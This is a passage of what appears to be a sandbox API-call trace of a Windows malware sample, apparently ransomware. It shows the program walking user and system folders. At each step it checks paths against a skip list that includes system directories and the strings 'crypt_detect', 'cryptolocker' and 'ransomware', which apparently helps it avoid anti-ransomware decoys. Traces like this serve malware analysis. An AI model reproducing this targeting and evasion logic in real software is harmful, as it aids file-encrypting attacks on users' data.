hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 1 [0128.953] StrCmpW (psz1="WindowsHolographicDevices", psz2=".") returned 1 [0128.953] StrCmpW (psz1="WindowsHolographicDevices", psz2="..") returned 1 [0128.953] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.953] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.953] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="WindowsHolographicDevices", cchMax=1054 | out: psz1="C:\\ProgramData\\WindowsHolographicDevices") returned="C:\\ProgramData\\WindowsHolographicDevices" [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system32\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\local\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\boot\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\perflogs\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\programdata\\") returned=":\\ProgramData\\WindowsHolographicDevices" [0128.954] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 0 [0128.954] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.954] GetProcessHeap () returned 0xe30000 [0128.954] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0128.954] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0128.954] StrCmpW (psz1="Recovery", psz2=".") returned 1 [0128.954] StrCmpW (psz1="Recovery", psz2="..") returned 1 [0128.954] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xacefef79, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0128.954] StrCmpW (psz1="swapfile.sys", psz2=".") returned 1 [0128.954] StrCmpW (psz1="swapfile.sys", psz2="..") returned 1 [0128.954] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0128.954] StrCmpW (psz1="System Volume Information", psz2=".") returned 1 [0128.954] StrCmpW (psz1="System Volume Information", psz2="..") returned 1 [0128.954] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0128.954] StrCmpW (psz1="Users", psz2=".") returned 1 [0128.954] StrCmpW (psz1="Users", psz2="..") returned 1 [0128.954] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.954] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.954] StrNCatW (in: psz1="C:\\", psz2="Users", cchMax=1030 | out: psz1="C:\\Users") returned="C:\\Users" [0128.954] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system32\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.954] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\local\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\boot\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\perflogs\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\programdata\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\drivers\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\wsus\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="crypt_detect") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="cryptolocker") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="ransomware") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\WINDOWS") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.955] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files") returned 0x0 [0128.955] GetProcessHeap () returned 0xe30000 [0128.955] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x492) returned 0xf0daf8 [0128.955] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0128.955] StrNCatW (in: psz1="C:\\Users", psz2="\\*", cchMax=1042 | out: psz1="C:\\Users\\*") returned="C:\\Users\\*" [0128.955] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.955] StrCmpW (psz1=".", psz2=".") returned 0 [0128.955] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.955] StrCmpW (psz1="..", psz2=".") returned 1 [0128.955] StrCmpW (psz1="..", psz2="..") returned 0 [0128.955] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0128.955] StrCmpW (psz1="All Users", psz2=".") returned 1 [0128.955] StrCmpW (psz1="All Users", psz2="..") returned 1 [0128.955] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0128.955] StrCmpW (psz1="Default", psz2=".") returned 1 [0128.955] StrCmpW (psz1="Default", psz2="..") returned 1 [0128.956] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0128.956] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0128.956] StrNCatW (in: psz1="C:\\Users\\", psz2="Default", cchMax=1042 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system32\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\local\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\boot\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\perflogs\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\programdata\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\drivers\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\wsus\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="crypt_detect") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="cryptolocker") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="ransomware") returned 0x0 [0128.956] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\WINDOWS") returned 0x0 [0128.956] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0128.956] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\*", cchMax=1058 | out: psz1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0128.956] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0128.957] StrCmpW (psz1=".", psz2=".") returned 0 [0128.957] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.957] StrCmpW (psz1="..", psz2=".") returned 1 [0128.957] StrCmpW (psz1="..", psz2="..") returned 0 [0128.957] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0128.957] StrCmpW (psz1="AppData", psz2=".") returned 1 [0128.957] StrCmpW (psz1="AppData", psz2="..") returned 1 [0128.957] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0128.957] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0128.957] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="AppData", cchMax=1058 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0128.957] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0128.957] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0128.957] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0128.957] StrCmpW (psz1=".", psz2=".") returned 0 [0128.957] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.957] StrCmpW (psz1="..", psz2=".") returned 1 [0128.957] StrCmpW (psz1="..", psz2="..") returned 0 [0128.957] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0128.957] StrCmpW (psz1="Local", psz2=".") returned 1 [0128.957] StrCmpW (psz1="Local", psz2="..") returned 1 [0128.957] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0128.957] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0128.957] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Local", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0128.957] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0128.957] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\*", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\*") returned="C:\\Users\\Default\\AppData\\Local\\*" [0128.958] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0128.958] StrCmpW (psz1=".", psz2=".") returned 0 [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.958] StrCmpW (psz1="..", psz2=".") returned 1 [0128.958] StrCmpW (psz1="..", psz2="..") returned 0 [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0128.958] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0128.958] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0128.958] StrCmpW (psz1="History", psz2=".") returned 1 [0128.958] StrCmpW (psz1="History", psz2="..") returned 1 [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0128.958] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0128.958] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0128.958] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0128.958] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0128.958] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Microsoft", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0128.958] StrCmpW (psz1="Temp", psz2=".") returned 1 [0128.958] StrCmpW (psz1="Temp", psz2="..") returned 1 [0128.958] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0128.958] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0128.958] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Temp", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0128.958] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0128.958] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0128.958] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0128.958] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0128.959] GetProcessHeap () returned 0xe30000 [0128.959] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0128.959] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, 